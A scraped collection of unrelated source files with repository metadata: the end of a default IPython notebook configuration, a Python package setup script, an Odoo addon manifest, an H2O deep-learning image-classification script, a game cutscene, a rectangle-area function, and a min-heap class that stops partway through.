# The url for MathJax.js.
# c.NotebookApp.mathjax_url = ''
# Supply extra arguments that will be passed to Jinja environment.
# c.NotebookApp.jinja_environment_options = {}
# The IP address the notebook server will listen on.
# c.NotebookApp.ip = 'localhost'
# DEPRECATED use base_url
# c.NotebookApp.base_project_url = '/'
# Create a massive crash report when IPython encounters what may be an internal
# error. The default is to append a short message to the usual traceback
# c.NotebookApp.verbose_crash = False
# The random bytes used to secure cookies. By default this is a new random
# number every time you start the Notebook. Set it to a value in a config file
# to enable logins to persist across server sessions.
#
# Note: Cookie secrets should be kept private, do not share config files with
# cookie_secret stored in plaintext (you can read the value from a file).
# c.NotebookApp.cookie_secret = ''
# The number of additional ports to try if the specified port is not available.
# c.NotebookApp.port_retries = 50
# Whether to open in a browser after starting. The specific browser used is
# platform dependent and determined by the python standard library `webbrowser`
# module, unless it is overridden using the --browser (NotebookApp.browser)
# configuration option.
# c.NotebookApp.open_browser = True
# The notebook manager class to use.
# c.NotebookApp.notebook_manager_class = 'IPython.html.services.notebooks.filenbmanager.FileNotebookManager'
# The date format used by logging formatters for %(asctime)s
# c.NotebookApp.log_datefmt = '%Y-%m-%d %H:%M:%S'
# The port the notebook server will listen on.
# c.NotebookApp.port = 8888
# Whether to overwrite existing config files when copying
# c.NotebookApp.overwrite = False
# Whether to enable MathJax for typesetting math/TeX
#
# MathJax is the javascript library IPython uses to render math/LaTeX. It is
# very large, so you may want to disable it if you have a slow internet
# connection, or for offline use of the notebook.
#
# When disabled, equations etc. will appear as their untransformed TeX source.
# c.NotebookApp.enable_mathjax = True
# The full path to an SSL/TLS certificate file.
# c.NotebookApp.certfile = u''
# The base URL for the notebook server.
#
# Leading and trailing slashes can be omitted, and will automatically be added.
# c.NotebookApp.base_url = '/'
# The directory to use for notebooks and kernels.
# c.NotebookApp.notebook_dir = u'/Users/jhokanson/SVN/FlowML'
#
# c.NotebookApp.file_to_run = ''
# The IPython profile to use.
# c.NotebookApp.profile = u'default'
# paths for Javascript extensions. By default, this is just
# IPYTHONDIR/nbextensions
# c.NotebookApp.nbextensions_path = []
# The name of the IPython directory. This directory is used for logging
# configuration (through profiles), history storage, etc. The default is usually
# $HOME/.ipython. This options can also be specified through the environment
# variable IPYTHONDIR.
# c.NotebookApp.ipython_dir = u''
# Set the log level by value or name.
# c.NotebookApp.log_level = 30
# Hashed password to use for web authentication.
#
# To generate, type in a python/IPython shell:
#
# from IPython.lib import passwd; passwd()
#
# The string should be of the form type:salt:hashed-password.
# c.NotebookApp.password = u''
# The Logging format template
# c.NotebookApp.log_format = '[%(name)s]%(highlevel)s %(message)s'
# Path to an extra config file to load.
#
# If specified, load this config file in addition to any other IPython config.
# c.NotebookApp.extra_config_file = u''
# Extra paths to search for serving static files.
#
# This allows adding javascript/css to be available from the notebook server
# machine, or overriding individual files in the IPython
# c.NotebookApp.extra_static_paths = []
# Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-
# For headerssent by the upstream reverse proxy. Necessary if the proxy handles
# SSL
# c.NotebookApp.trust_xheaders = False
# Whether to install the default config files into the profile dir. If a new
# profile is being created, and IPython contains config files for that profile,
# then they will be staged into the new directory. Otherwise, default config
# files will be automatically generated.
# c.NotebookApp.copy_config_files = False
# The full path to a private key file for usage with SSL/TLS.
# c.NotebookApp.keyfile = u''
# Supply overrides for the tornado.web.Application that the IPython notebook
# uses.
# c.NotebookApp.webapp_settings = {}
# Specify what command to use to invoke a web browser when opening the notebook.
# If not specified, the default browser will be determined by the `webbrowser`
# standard library module, which allows setting of the BROWSER environment
# variable to override it.
# c.NotebookApp.browser = u''
#------------------------------------------------------------------------------
# IPKernelApp configuration
#------------------------------------------------------------------------------
# IPython: an enhanced interactive Python shell.
# IPKernelApp will inherit config from: BaseIPythonApplication, Application,
# InteractiveShellApp
# Run the file referenced by the PYTHONSTARTUP environment variable at IPython
# startup.
# c.IPKernelApp.exec_PYTHONSTARTUP = True
# The importstring for the DisplayHook factory
# c.IPKernelApp.displayhook_class = 'IPython.kernel.zmq.displayhook.ZMQDisplayHook'
# Set the IP or interface on which the kernel will listen.
# c.IPKernelApp.ip = u''
# Pre-load matplotlib and numpy for interactive use, selecting a particular
# matplotlib backend and loop integration.
# c.IPKernelApp.pylab = None
# Create a massive crash report when IPython encounters what may be an internal
# error. The default is to append a short message to the usual traceback
# c.IPKernelApp.verbose_crash = False
# The Kernel subclass to be used.
#
# This should allow easy re-use of the IPKernelApp entry point to configure and
# launch kernels other than IPython's own.
# c.IPKernelApp.kernel_class = 'IPython.kernel.zmq.ipkernel.Kernel'
# Run the module as a script.
# c.IPKernelApp.module_to_run = ''
# The date format used by logging formatters for %(asctime)s
# c.IPKernelApp.log_datefmt = '%Y-%m-%d %H:%M:%S'
# set the shell (ROUTER) port [default: random]
# c.IPKernelApp.shell_port = 0
# set the control (ROUTER) port [default: random]
# c.IPKernelApp.control_port = 0
# Whether to overwrite existing config files when copying
# c.IPKernelApp.overwrite = False
# Execute the given command string.
# c.IPKernelApp.code_to_run = ''
# set the stdin (ROUTER) port [default: random]
# c.IPKernelApp.stdin_port = 0
# Set the log level by value or name.
# c.IPKernelApp.log_level = 30
# lines of code to run at IPython startup.
# c.IPKernelApp.exec_lines = []
# Path to an extra config file to load.
#
# If specified, load this config file in addition to any other IPython config.
# c.IPKernelApp.extra_config_file = u''
# The importstring for the OutStream factory
# c.IPKernelApp.outstream_class = 'IPython.kernel.zmq.iostream.OutStream'
# Whether to create profile dir if it doesn't exist
# c.IPKernelApp.auto_create = False
# set the heartbeat port [default: random]
# c.IPKernelApp.hb_port = 0
#
# c.IPKernelApp.transport = 'tcp'
# redirect stdout to the null device
# c.IPKernelApp.no_stdout = False
# Should variables loaded at startup (by startup files, exec_lines, etc.) be
# hidden from tools like %who?
# c.IPKernelApp.hide_initial_ns = True
# dotted module name of an IPython extension to load.
# c.IPKernelApp.extra_extension = ''
# A file to be run
# c.IPKernelApp.file_to_run = ''
# The IPython profile to use.
# c.IPKernelApp.profile = u'default'
#
# c.IPKernelApp.parent_appname = u''
# kill this process if its parent dies. On Windows, the argument specifies the
# HANDLE of the parent process, otherwise it is simply boolean.
# c.IPKernelApp.parent_handle = 0
# JSON file in which to store connection info [default: kernel-<pid>.json]
#
# This file will contain the IP, ports, and authentication key needed to connect
# clients to this kernel. By default, this file will be created in the security
# dir of the current profile, but can be specified by absolute path.
# c.IPKernelApp.connection_file = ''
# If true, IPython will populate the user namespace with numpy, pylab, etc. and
# an ``import *`` is done from numpy and pylab, when using pylab mode.
#
# When False, pylab mode should not import any names into the user namespace.
# c.IPKernelApp.pylab_import_all = True
# The name of the IPython directory. This directory is used for logging
# configuration (through profiles), history storage, etc. The default is usually
# $HOME/.ipython. This options can also be specified through the environment
# variable IPYTHONDIR.
# c.IPKernelApp.ipython_dir = u''
# Configure matplotlib for interactive use with the default matplotlib backend.
# c.IPKernelApp.matplotlib = None
# ONLY USED ON WINDOWS Interrupt this process when the parent is signaled.
# c.IPKernelApp.interrupt = 0
# Whether to install the default config files into the profile dir. If a new
# profile is being created, and IPython contains config files for that profile,
# then they will be staged into the new directory. Otherwise, default config
# files will be automatically generated.
# c.IPKernelApp.copy_config_files = False
# List of files to run at IPython startup.
# c.IPKernelApp.exec_files = []
# Enable GUI event loop integration with any of ('glut', 'gtk', 'gtk3', 'none',
# 'osx', 'pyglet', 'qt', 'qt4', 'tk', 'wx').
# c.IPKernelApp.gui = None
# A list of dotted module names of IPython extensions to load.
# c.IPKernelApp.extensions = []
# redirect stderr to the null device
# c.IPKernelApp.no_stderr = False
# The Logging format template
# c.IPKernelApp.log_format = '[%(name)s]%(highlevel)s %(message)s'
# set the iopub (PUB) port [default: random]
# c.IPKernelApp.iopub_port = 0
#------------------------------------------------------------------------------
# ZMQInteractiveShell configuration
#------------------------------------------------------------------------------
# A subclass of InteractiveShell for ZMQ.
# ZMQInteractiveShell will inherit config from: InteractiveShell
# Use colors for displaying information about objects. Because this information
# is passed through a pager (like 'less'), and some pagers get confused with
# color codes, this capability can be turned off.
# c.ZMQInteractiveShell.color_info = True
# A list of ast.NodeTransformer subclass instances, which will be applied to
# user input before code is run.
# c.ZMQInteractiveShell.ast_transformers = []
#
# c.ZMQInteractiveShell.history_length = 10000
# Don't call post-execute functions that have failed in the past.
# c.ZMQInteractiveShell.disable_failing_post_execute = False
# Show rewritten input, e.g. for autocall.
# c.ZMQInteractiveShell.show_rewritten_input = True
# Set the color scheme (NoColor, Linux, or LightBG).
# c.ZMQInteractiveShell.colors = 'LightBG'
#
# c.ZMQInteractiveShell.separate_in = '\n'
# Deprecated, use PromptManager.in2_template
# c.ZMQInteractiveShell.prompt_in2 = ' .\\D.: '
#
# c.ZMQInteractiveShell.separate_out = ''
# Deprecated, use PromptManager.in_template
# c.ZMQInteractiveShell.prompt_in1 = 'In [\\#]: '
# Enable deep (recursive) reloading by default. IPython can use the deep_reload
# module which reloads changes in modules recursively (it replaces the reload()
# function, so you don't need to change anything to use it). deep_reload()
# forces a full reload of modules whose code may have changed, which the default
# reload() function does not. When deep_reload is off, IPython will use the
# normal reload(), but deep_reload will still be available as dreload().
# c.ZMQInteractiveShell.deep_reload = False
# Make IPython automatically call any callable object even if you didn't type
# explicit parentheses. For example, 'str 43' becomes 'str(43)' automatically.
# The value can be '0' to disable the feature, '1' for 'smart' autocall, where
# it is not applied if there are no more arguments on the line, and '2' for
# 'full' autocall, where all callable objects are automatically called (even if
# no arguments are present).
# c.ZMQInteractiveShell.autocall = 0
#
# c.ZMQInteractiveShell.separate_out2 = ''
# Deprecated, use PromptManager.justify
# c.ZMQInteractiveShell.prompts_pad_left = True
#
# c.ZMQInteractiveShell.readline_parse_and_bind = ['tab: complete', '"\\C-l": clear-screen', 'set show-all-if-ambiguous on', '"\\C-o": tab-insert', '"\\C-r": reverse-search-history', '"\\C-s": forward-search-history', '"\\C-p": history-search-backward', '"\\C-n": history-search-forward', '"\\e[A": history-search-backward', '"\\e[B": history-search-forward', '"\\C-k": kill-line', '"\\C-u": unix-line-discard']
# Enable magic commands to be called without the leading %.
# c.ZMQInteractiveShell.automagic = True
#
# c.ZMQInteractiveShell.debug = False
#
# c.ZMQInteractiveShell.object_info_string_level = 0
#
# c.ZMQInteractiveShell.ipython_dir = ''
#
# c.ZMQInteractiveShell.readline_remove_delims = '-/~'
# Start logging to the default log file.
# c.ZMQInteractiveShell.logstart = False
# The name of the logfile to use.
# c.ZMQInteractiveShell.logfile = ''
#
# c.ZMQInteractiveShell.wildcards_case_sensitive = True
# Save multi-line entries as one entry in readline history
# c.ZMQInteractiveShell.multiline_history = True
# Start logging to the given file in append mode.
# c.ZMQInteractiveShell.logappend = ''
#
# c.ZMQInteractiveShell.xmode = 'Context'
#
# c.ZMQInteractiveShell.quiet = False
# Deprecated, use PromptManager.out_template
# c.ZMQInteractiveShell.prompt_out = 'Out[\\#]: '
# Set the size of the output cache. The default is 1000, you can change it
# permanently in your config file. Setting it to 0 completely disables the
# caching system, and the minimum value accepted is 20 (if you provide a value
# less than 20, it is reset to 0 and a warning is issued). This limit is
# defined because otherwise you'll spend more time re-flushing a too small cache
# than working
# c.ZMQInteractiveShell.cache_size = 1000
# 'all', 'last', 'last_expr' or 'none', specifying which nodes should be run
# interactively (displaying output from expressions).
# c.ZMQInteractiveShell.ast_node_interactivity = 'last_expr'
# Automatically call the pdb debugger after every exception.
# c.ZMQInteractiveShell.pdb = False
#------------------------------------------------------------------------------
# KernelManager configuration
#------------------------------------------------------------------------------
# Manages a single kernel in a subprocess on this host.
#
# This version starts kernels with Popen.
# KernelManager will inherit config from: ConnectionFileMixin
# The Popen Command to launch the kernel. Override this if you have a custom
# kernel. If kernel_cmd is specified in a configuration file, IPython does not
# pass any arguments to the kernel, because it cannot make any assumptions about
# the arguments that the kernel understands. In particular, this means that the
# kernel does not receive the option --debug if it given on the IPython command
# line.
# c.KernelManager.kernel_cmd = []
# Set the kernel's IP address [default localhost]. If the IP address is
# something other than localhost, then Consoles on other machines will be able
# to connect to the Kernel, so be careful!
# c.KernelManager.ip = u''
#
# c.KernelManager.transport = 'tcp'
# Should we autorestart the kernel if it dies.
# c.KernelManager.autorestart = False
#------------------------------------------------------------------------------
# ProfileDir configuration
#------------------------------------------------------------------------------
# An object to manage the profile directory and its resources.
#
# The profile directory is used by all IPython applications, to manage
# configuration, logging and security.
#
# This object knows how to find, create and manage these directories. This
# should be used by any code that wants to handle profiles.
# Set the profile location directly. This overrides the logic used by the
# `profile` option.
# c.ProfileDir.location = u''
#------------------------------------------------------------------------------
# Session configuration
#------------------------------------------------------------------------------
# Object for handling serialization and sending of messages.
#
# The Session object handles building messages and sending them with ZMQ sockets
# or ZMQStream objects. Objects can communicate with each other over the
# network via Session objects, and only need to work with the dict-based IPython
# message spec. The Session will handle serialization/deserialization, security,
# and metadata.
#
# Sessions support configurable serialiization via packer/unpacker traits, and
# signing with HMAC digests via the key/keyfile traits.
#
# Parameters ----------
#
# debug : bool
# whether to trigger extra debugging statements
# packer/unpacker : str : 'json', 'pickle' or import_string
# importstrings for methods to serialize message parts. If just
# 'json' or 'pickle', predefined JSON and pickle packers will be used.
# Otherwise, the entire importstring must be used.
#
# The functions must accept at least valid JSON input, and output *bytes*.
#
# For example, to use msgpack:
# packer = 'msgpack.packb', unpacker='msgpack.unpackb'
# pack/unpack : callables
# You can also set the pack/unpack callables for serialization directly.
# session : bytes
# the ID of this Session object. The default is to generate a new UUID.
# username : unicode
# username added to message headers. The default is to ask the OS.
# key : bytes
# The key used to initialize an HMAC signature. If unset, messages
# will not be signed or checked.
# keyfile : filepath
# The file containing a key. If this is set, `key` will be initialized
# to the contents of the file.
# Username for the Session. Default is your system username.
# c.Session.username = u'jhokanson'
# The name of the unpacker for unserializing messages. Only used with custom
# functions for `packer`.
# c.Session.unpacker = 'json'
# Threshold (in bytes) beyond which a buffer should be sent without copying.
# c.Session.copy_threshold = 65536
# The name of the packer for serializing messages. Should be one of 'json',
# 'pickle', or an import name for a custom callable serializer.
# c.Session.packer = 'json'
# The maximum number of digests to remember.
#
# The digest history will be culled when it exceeds this value.
# c.Session.digest_history_size = 65536
# The UUID identifying this session.
# c.Session.session = u''
# The digest scheme used to construct the message signatures. Must have the form
# 'hmac-HASH'.
# c.Session.signature_scheme = 'hmac-sha256'
# execution key, for extra authentication.
# c.Session.key = ''
# Debug output in the Session
# c.Session.debug = False
# The maximum number of items for a container to be introspected for custom
# serialization. Containers larger than this are pickled outright.
# c.Session.item_threshold = 64
# path to file containing execution key.
# c.Session.keyfile = ''
# Threshold (in bytes) beyond which an object's buffer should be extracted to
# avoid pickling.
# c.Session.buffer_threshold = 1024
# Metadata dictionary, which serves as the default top-level metadata dict for
# each message.
# c.Session.metadata = {}
#------------------------------------------------------------------------------
# InlineBackend configuration
#------------------------------------------------------------------------------
# An object to store configuration of the inline backend.
# The figure format to enable (deprecated use `figure_formats` instead)
# c.InlineBackend.figure_format = u''
# A set of figure formats to enable: 'png', 'retina', 'jpeg', 'svg', 'pdf'.
# c.InlineBackend.figure_formats = set(['png'])
# Extra kwargs to be passed to fig.canvas.print_figure.
#
# Logical examples include: bbox_inches, quality (for jpeg figures), etc.
# c.InlineBackend.print_figure_kwargs = {'bbox_inches': 'tight'}
# Close all figures at the end of each cell.
#
# When True, ensures that each cell starts with no active figures, but it also
# means that one must keep track of references in order to edit or redraw
# figures in subsequent cells. This mode is ideal for the notebook, where
# residual plots from other cells might be surprising.
#
# When False, one must call figure() to create new figures. This means that
# gcf() and getfigs() can reference figures created in other cells, and the
# active figure can continue to be edited with pylab/pyplot methods that
# reference the current active figure. This mode facilitates iterative editing
# of figures, and behaves most consistently with other matplotlib backends, but
# figure barriers between cells must be explicit.
# c.InlineBackend.close_figures = True
# Subset of matplotlib rcParams that should be different for the inline backend.
# c.InlineBackend.rc = {'font.size': 10, 'figure.figsize': (6.0, 4.0), 'figure.facecolor': (1, 1, 1, 0), 'savefig.dpi': 72, 'figure.subplot.bottom': 0.125, 'figure.edgecolor': (1, 1, 1, 0)}
#------------------------------------------------------------------------------
# MappingKernelManager configuration
#------------------------------------------------------------------------------
# A KernelManager that handles notebook mapping and HTTP error handling
# MappingKernelManager will inherit config from: MultiKernelManager
#
# c.MappingKernelManager.root_dir = u'/Users/jhokanson/SVN/FlowML'
# The kernel manager class. This is configurable to allow subclassing of the
# KernelManager for customized behavior.
# c.MappingKernelManager.kernel_manager_class = 'IPython.kernel.ioloop.IOLoopKernelManager'
#------------------------------------------------------------------------------
# NotebookManager configuration
#------------------------------------------------------------------------------
# Glob patterns to hide in file and directory listings.
# c.NotebookManager.hide_globs = [u'__pycache__']
#------------------------------------------------------------------------------
# FileNotebookManager configuration
#------------------------------------------------------------------------------
# FileNotebookManager will inherit config from: NotebookManager
# The directory name in which to keep notebook checkpoints
#
# This is a path relative to the notebook's own directory.
#
# By default, it is .ipynb_checkpoints
# c.FileNotebookManager.checkpoint_dir = '.ipynb_checkpoints'
# Glob patterns to hide in file and directory listings.
# c.FileNotebookManager.hide_globs = [u'__pycache__']
# Automatically create a Python script when saving the notebook.
#
# For easier use of import, %run and %load across notebooks, a <notebook-
# name>.py script will be created next to any <notebook-name>.ipynb on each
# save. This can also be set with the short `--script` flag.
# c.FileNotebookManager.save_script = False
#
# c.FileNotebookManager.notebook_dir = u'/Users/jhokanson/SVN/FlowML'
#------------------------------------------------------------------------------
# NotebookNotary configuration
#------------------------------------------------------------------------------
# A class for computing and verifying notebook signatures.
# The secret key with which notebooks are signed.
# c.NotebookNotary.secret = ''
# The file where the secret key is stored.
# c.NotebookNotary.secret_file = u''
# The hashing algorithm used to sign notebooks.
# c.NotebookNotary.algorithm = 'sha256'
| [
"jeffrey@hokanson.us"
] | jeffrey@hokanson.us |
fd791a584893677dea53bfac1e465f9e26f68440 | bd3bd2f1be4c408faa57b1c88a374f304fd8eaa6 | /setup.py | 7a7ba4d8a783fc59fb395b278a611abcdf5d9993 | [
"MIT"
] | permissive | Soebb/PyYouTube | bf8873333dfaa81b7ca8845123a69faee5301540 | 125b9f63b677eeece9d95790505a3818ed26c94d | refs/heads/main | 2023-07-13T16:43:27.154729 | 2021-08-12T21:16:11 | 2021-08-12T21:16:11 | 395,442,681 | 0 | 0 | MIT | 2021-08-12T21:00:40 | 2021-08-12T21:00:40 | null | UTF-8 | Python | false | false | 728 | py | import pathlib
import setuptools
# Packaging configuration for the PyYouTube distribution (setuptools-based).
# The long description shown on PyPI is read from the README next to setup.py.
file = pathlib.Path(__file__).parent
README = (file / "README.md").read_text()
setuptools.setup(
    name="PyYouTube",
    version="1.0.2",
    author="mrlokaman",
    author_email="ln0technical@gmail.com",
    long_description = README,
    long_description_content_type = "text/markdown",
    description="Python library Get YouTube Video Data",
    license="MIT",
    url="https://github.com/lntechnical2/PyYouTube",
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    # Automatically discover all packages in the repository.
    packages=setuptools.find_packages(),
    install_requires = [],
    python_requires=">=3.6",
)
| [
"noreply@github.com"
] | Soebb.noreply@github.com |
d862a18d54b56460bd7814306f7f05e308534c29 | 688cd4dd42ac526e7e995cb391eae2dfc2963e51 | /payroll_email/__manifest__.py | ca10fc6d56f5abf5d61c037de386ecaa2d5e42d2 | [] | no_license | tonyfreemind/odoo13_lajaraltd_custom_addons | 3f738cad326b841a42c3537aff1327b8154eaa9e | c569895999f3ec839520b9350d7b13509da22d04 | refs/heads/master | 2023-03-16T12:38:52.717824 | 2020-02-11T12:25:39 | 2020-02-11T12:25:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,810 | py | # -*- coding: utf-8 -*-
###################################################################################
# Payroll Email Project
#
# E-Soft Solution
# Copyright (C) 2018-TODAY E-Soft Solution (<https://www.sagarnetwork.com>).
# Author: Sagar Jayswal (<https://www.sagarnetwork.com>)
#
# This program is free software: you can modify
# it under the terms of the GNU Affero General Public License (AGPL) as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; See the GNU Affero General Public
# License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
###################################################################################
# Odoo addon manifest: declarative metadata evaluated by the module loader.
{
    'name': 'Payroll Email/Mass E-mail',
    'version': '12.0.1.0.0',
    'summary': """Helps to send payroll Slip to Employees through Email.""",
    'description': 'This module helps you to send payslip through Email.',
    'category': 'Generic Modules/Human Resources',
    'author': 'E-soft Solution',
    'company': 'E-Soft Solution',
    'website': "https://www.sagarnetwork.com",
    # Addons that must be available before this one (Odoo dependency list).
    'depends': ['base', 'hr_payroll_community', 'mail', 'hr'],
    # Data files loaded on install/update, in order.
    'data': [
        # 'security/ir.model.access.csv',
        'data/mail_template.xml',
        'views/hr_payroll.xml',
        'views/hr_payslip_wizard_view.xml',
        'views/hr_mass_payroll_wizard.xml'
    ],
    'demo': [],
    'images': ['static/description/banner.png'],
    'license': 'AGPL-3',
    'installable': True,
    'auto_install': False,
    'application': False,
}
| [
"imbipul9@gmail.com"
] | imbipul9@gmail.com |
96b504a735cf6e04622a461658a2dbab9ebb16dd | 8f428e090b7b54868d55f7772c3bb22701d0fbd8 | /coil_20_deeplearning.py | c8a5060573dd49ff9f326a7c12165c3adb0e720b | [] | no_license | LPTgrumpycats/deeplearning | e16fe9296441e4d4e0fa56b9e7c366e47c2b44b1 | 79bf9595ab9e63b9c3ecc118dfd79a20a14e6064 | refs/heads/master | 2020-12-29T02:19:00.062773 | 2015-12-01T23:46:30 | 2015-12-01T23:46:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,127 | py | __author__ = 'vincentpham'
import glob
from PIL import Image
import numpy as np
import csv
import time
import h2o
from h2o.estimators.deeplearning import H2ODeepLearningEstimator
# Collect every COIL-20 image; filenames look like "objN__M.png" where N is
# the object id and M is the pose index.
files = glob.glob("coil-20-proc/*.png")
n = len(files)
files_split__ = [x.split("__") for x in files]
obj_id = [[x[0].split("/")[1],x[1].split(".")[0]] for x in files_split__]
#Inspecting png file
im = Image.open(files[0])
im.size #128x128
#Split into 20% Testing and 80% training
for i in range(n):
    im = Image.open(files[i])
    pix = im.load()
    # Flatten the 128x128 image into one row of pixel values.
    pix_array = np.array(im)
    pix_array = np.reshape(pix_array,-1)
    pix_list = pix_array.tolist()
    # Every 5th image goes to the test split (20%), the rest to training.
    if i%5==0:
        with open("obj_file_test.csv", "a") as f:
            writer = csv.writer(f)
            writer.writerow([obj_id[i][0]] + pix_list)
    else:
        with open("obj_file_train.csv", "a") as f:
            writer = csv.writer(f)
            writer.writerow([obj_id[i][0]] + pix_list)
# Bug fix: this was a Python 2 print statement (`print "done writing"`),
# which is a SyntaxError in Python 3 — the rest of the file uses print().
print("done writing")
h2o.init()
train = h2o.import_file("obj_file_train.csv")
test = h2o.import_file("obj_file_test.csv")
y = train.names[0]
x = train.names[1:]
#Encode the response columns as categorical for multinomial classification
train[y] = train[y].asfactor()
test[y] = test[y].asfactor()
start_time = time.time()
# Train Deep Learning model and validate on test set
model = H2ODeepLearningEstimator(distribution="multinomial",
                                 activation = "RectifierWithDropout",
                                 hidden = [400,600,400,600],
                                 input_dropout_ratio= .2,
                                 sparse = True,
                                 l1 = 1e-5,
                                 max_w2 = 10,
                                 train_samples_per_iteration=-1,
                                 classification_stop=-1,
                                 stopping_rounds=0,
                                 epochs = 200)
model.train(x=x,
            y=y,
            training_frame = train,
            validation_frame = test)
pred = model.predict(test)
pred.head() #not working?
# Compare predicted vs. true labels.
# NOTE(review): the first element is dropped from both series — presumably a
# header/offset artifact of as_data_frame(); confirm against the h2o version.
test_np = test.as_data_frame()[0]
test_np = test_np[1:]
pred_np = pred.as_data_frame()[0]
pred_np = pred_np[1:]
wrong = 0
for i in range(len(pred_np)):
    if test_np[i] != pred_np[i]:
        wrong += 1
acc = 1 - wrong/float(len(pred_np))
print(acc)
end_time = time.time()
total_time = round(end_time - start_time,2)
print(total_time)
h2o.shutdown()
# Recorded experiment results: hidden-layer architecture, epochs -> accuracy, runtime(s).
#200x400x200 epoch = 10 -> 0.204861111111
#200x400x200 epoch = 100 -> [0.684027777778,0.739583333333] time = [,292.06]
#200x400x200x400 epoch = 100 -> [0.881944444444,0.715277777778] time = [,277.55]
#200,400,200,400,200 epoch = 100 -> 0.524305555556 time = 256.48
#300x500x300 epoch = 100 -> 0.9375 time = 409.3
#400x600x400 epoch = 100 -> 0.944444444444 time = 483.1
#400x600x400x600 epoch = 100 -> [0.989583333333,0.986111111111] time = [552.86,460.22]
#400x600x400x600x600 epoch = 100 -> 0.913194444444 time = 488.3
#500x600x500x600 epoch = 100 -> 0.986111111111 time = 481.0
"vincentpham@gmail.com"
] | vincentpham@gmail.com |
42681a8005087fdf5af45ee8ea50da01ea85163e | 1764954b63a7033663545c0cc621bb45cfef5248 | /game/scenes/test_scene.py | 8ea6c44912c9de8bbbffb00a6cd0f9e8c5b7cecf | [] | no_license | shelsoloa/AgentObie | c9c5b2979e59a649a9148f3e1e5ebe06dfa7efa1 | 69d0c42a2674b20775dcc3d8578a8468739e0d45 | refs/heads/master | 2020-04-24T06:52:14.497763 | 2019-02-21T01:49:47 | 2019-02-21T01:49:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,165 | py | from peachy import PC
from game.scenes import Message, Scene, \
wait, wait_for_actor, wait_for_input, wait_for_message
from game.scenes.actors import Obie
class TestScene(Scene):
    """Scripted demo scene: walks Agent Obie across the screen while a
    dialogue box follows him."""
    def __init__(self, world):
        super().__init__(world)
    def advance(self):
        """Generator driving the cutscene; each wait_* helper yields until
        its condition (input, movement, message, or timer) completes."""
        # Create actors
        obie = Obie(50, PC().canvas_width / 4)
        obie.sprite.play('RUN')
        message = Message([
            "Looks like Agent Obie will have dialogue...",
            "How exciting!"],
            obie.x - 16, 42, obie)
        self.actors.append(obie)  # Show actor
        yield from wait_for_input()
        # Slide Obie and the dialogue box rightward together over 2 seconds.
        dx = message.x + Message.BOX_WIDTH - 16
        obie.move_to(dx, obie.y, 2000)
        message.move_to(dx - Message.BOX_WIDTH / 2, message.y, 2000)
        self.messages.append(message) # Show message
        yield from wait_for_message(message)
        yield from wait_for_actor(obie)
        yield from wait_for_input()
        # Dismiss the dialogue, walk Obie to screen centre, hold one second.
        self.messages.remove(message)
        obie.move_to(PC().canvas_width / 2, obie.y, 1500)
        yield from wait_for_actor(obie)
        yield from wait(1000)
        yield
| [
"a.sheldon.sol@gmail.com"
] | a.sheldon.sol@gmail.com |
510d5d810326d3d4bf1e76e31d39fa76b91e1e99 | 7d476485673b3e0904a0120ee9973a2e2b603c8d | /4เหลี่ยม.py | 17984e53dee4d972ca63934815095aa0d48fa737 | [] | no_license | KARGOREO/Test.com | f8b1948c9354631eea3af08e1a91ccefda1dfc2f | f282ffddabcfacf0c453831e9c423c33ce040f87 | refs/heads/main | 2023-03-15T01:21:27.690994 | 2021-03-24T12:51:22 | 2021-03-24T12:51:22 | 351,050,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 206 | py | def V2():
width = 12
xlong = 13
area = width * xlong
print("พื้นที่สี่เหลี่ยมผืนผ้ามีค่าเท่ากับ %.2f" % area)
V2() | [
"oppwerq@gmail.com"
] | oppwerq@gmail.com |
bb12b060c5d0a70a3b69d0c5c11ae3e745a880c0 | c57f97c6eac08f91814d3144f6e2b1cc066438ce | /ai/testers/minheap.py | 94d23405cf7abce4c56e1f75b7e1d89be2c23da9 | [] | no_license | Michael-Nath-HS/MKS21X | 92853f708539693d86ee113adde6db0b6ca4bed0 | 28c3fb200947ee202530899bbbd29458a72872ea | refs/heads/master | 2022-04-08T11:10:55.236277 | 2020-02-12T12:11:59 | 2020-02-12T12:11:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,025 | py | from math import floor
class Node:
    """One heap slot: a payload value plus its 1-based index in the heap list."""

    def __init__(self, v):
        self.data = v          # stored value
        self.position = None   # filled in by the heap when the node is inserted

    def __str__(self):
        label = "NODE WITH VALUE: %d"
        return label % self.data
class Pqueue:
    """Min-heap priority queue backed by a 1-indexed list of Node objects.

    listy[0] is a None sentinel so the children of index i live at 2*i and
    2*i + 1 and its parent at i // 2.

    Bug fixes relative to the original:
    * pop()'s sift-down loop never swapped or advanced, so it hung forever
      on any heap deeper than two levels; it now restores the heap
      property and returns the removed minimum value.
    * pop() on a single-element heap indexed past the shrunken list
      (IndexError); it is now handled.
    """

    def __init__(self):
        # Index 0 is an unused sentinel; real elements start at index 1.
        self.listy = [None]

    def _swap(self, i, j):
        # Exchange payloads only; each Node's position stays tied to its slot,
        # matching the original data-swap scheme.
        a, b = self.listy[i], self.listy[j]
        a.data, b.data = b.data, a.data

    def _sift_up(self, i):
        # Bubble the value at index i toward the root while smaller than parent.
        while i > 1 and self.listy[i // 2].data > self.listy[i].data:
            self._swap(i, i // 2)
            i //= 2

    def _sift_down(self, i):
        # Push the value at index i down until the min-heap property holds.
        size = len(self.listy)
        while True:
            smallest = i
            left, right = 2 * i, 2 * i + 1
            if left < size and self.listy[left].data < self.listy[smallest].data:
                smallest = left
            if right < size and self.listy[right].data < self.listy[smallest].data:
                smallest = right
            if smallest == i:
                return
            self._swap(i, smallest)
            i = smallest

    def push(self, v):
        """Insert value v.

        Returns "Inserted <v>"; for the very first element it returns None,
        preserving the original method's behaviour.
        """
        anode = Node(v)
        self.listy.append(anode)
        anode.position = len(self.listy) - 1
        if anode.position == 1:
            return
        self._sift_up(anode.position)
        return "Inserted %d" % v

    def tolist(self):
